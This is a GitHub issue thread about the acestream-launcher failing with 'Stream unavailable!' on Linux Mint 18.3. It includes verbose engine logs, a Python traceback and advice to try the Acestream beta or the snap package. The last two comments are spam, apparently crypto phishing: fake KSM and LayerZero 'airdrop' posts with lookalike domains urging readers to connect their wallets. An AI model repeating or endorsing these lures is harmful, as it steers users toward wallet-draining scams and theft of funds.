### ISSUE TITLE
Can't make it work under Mint 18.3

### ISSUE THREAD

**Issue by colibris79** [jonian/acestream-launcher#35]
Hi, 
My Acestream installation is working fine under Mint 18.3 Mate, but I wanted to try your launcher to see the acestreams with mpv or other players. For some reason I always get that the "Stream unavailable!" error (I'm trying working streams under the normal installation).
I am in China so I am trying both with my vpn on or off. 
I've also got this other error when trying to use it with my vpn on:

```
Stream unavailable!

Exiting...
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
    self.run()
  File "/usr/lib/python2.7/threading.py", line 754, in run
    self.__target(*self.__args, **self.__kwargs)
  File "/usr/local/lib/python2.7/dist-packages/acestream/engine.py", line 56, in _start_process
    self.process.communicate()
AttributeError: 'NoneType' object has no attribute 'communicate'
```
Any ideas? Thanks

**Comment by jonian** [comment]
Hi @colibris79, please run launcher with the `-v` argument and provide the output.

**Comment by colibris79** [comment]
Hi @jonian . Thanks for your fast response. 
Here it goes:
```
Connecting to Acestream engine...2018-11-19 09:33:04,310|MainThread|acestream|platform=linux
2018-11-19 09:33:04,311|MainThread|acestream|app=acestream
2018-11-19 09:33:04,311|MainThread|acestream|version=3.0.5.1 code=3000501 revision=1415 date=2014-12-10
2018-11-19 09:33:04,311|MainThread|acestream|use_local_db=True
2018-11-19 09:33:04,311|MainThread|acestream|use_m2crypto=True
2018-11-19 09:33:04,311|MainThread|acestream|enable debug: 0
2018-11-19 09:33:04,311|MainThread|acestream|get_default_api_version: 2
2018-11-19 09:33:04,311|MainThread|acestream.coreapp|use fixed i2i_port: 62062
2018-11-19 09:33:04,335|MainThread|acestream.SocketHandler.InterruptSocket|bound on 127.0.0.1:44721
2018-11-19 09:33:04,335|MainThread|acestream.SocketHandler.SocketHandler|bind: socket bound: host=0.0.0.0 port=8621
2018-11-19 09:33:04,335|MainThread|acestream.LM|listen on 8621
2018-11-19 09:33:04,361|MainThread|acestream.VideoServer|start: addr=127.0.0.1 port=6878
2018-11-19 09:33:04,366|MainThread|acestream.SocketHandler.InterruptSocket|bound on 127.0.0.1:46292
2018-11-19 09:33:04,366|MainThread|acestream.SocketHandler.SocketHandler|bind: socket bound: host=127.0.0.1 port=62062
2018-11-19 09:33:04,366|Instance2InstanceThread-24|acestream.APIServer|run: ready to receive remote commands on 62062
Stream unavailable!

Exiting...
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
    self.run()
  File "/usr/lib/python2.7/threading.py", line 754, in run
    self.__target(*self.__args, **self.__kwargs)
  File "/usr/local/lib/python2.7/dist-packages/acestream/engine.py", line 56, in _start_process
    self.process.communicate()
AttributeError: 'NoneType' object has no attribute 'communicate'

```

I've tried a stream that was working and another one that was not and got basically the same output

**Comment by Hedronmx** [comment]
Getting the same error

**Comment by alexjp** [comment]
the new beta version of acestream for linux should fix this error

**Comment by colibris79** [comment]
@alexjp , where can I download beta versions for acestream?
EDIT: found it. Guess you refer to this ones:
[http://wiki.acestream.org/wiki/index.php/Download](url)

Has anyone tried it with acestream launcher already?

**Comment by alexjp** [comment]
follow this link: http://wiki.acestream.org/wiki/index.php/Download#Linux ( its the link on the readme of this project ).

in there, on the linux binaries, you have the beta acestream

EDIT: yes, it works ( if you have a libcrypto.so.1.0 missing, its because it needs openssl 1.0 ( some distros already have 1.1 ) )

**Comment by tp0** [comment]
Does the issue in OP happen with the Snap package too?

I'm using the Snap package on 18.10 Ubuntu (OP's Mint 18.3 is 16.04). No issues.

**Comment by colibris79** [comment]
I couldn't make it work even with the snap package. And now the acestream:// links in browser are not being opened by the acestream player  y have to manually open it and copy the url to play the stream. How can I restore my browser to open automatically the acestream:// links with acestream player?

**Comment by dinozombie** [comment]
Same issue with Debian testing and openssl 1.1. Using beta version (acestream 3.1.35) from [wiki](http://wiki.acestream.org/wiki/index.php/Download) and getting the same error.

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by vokaplok** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!
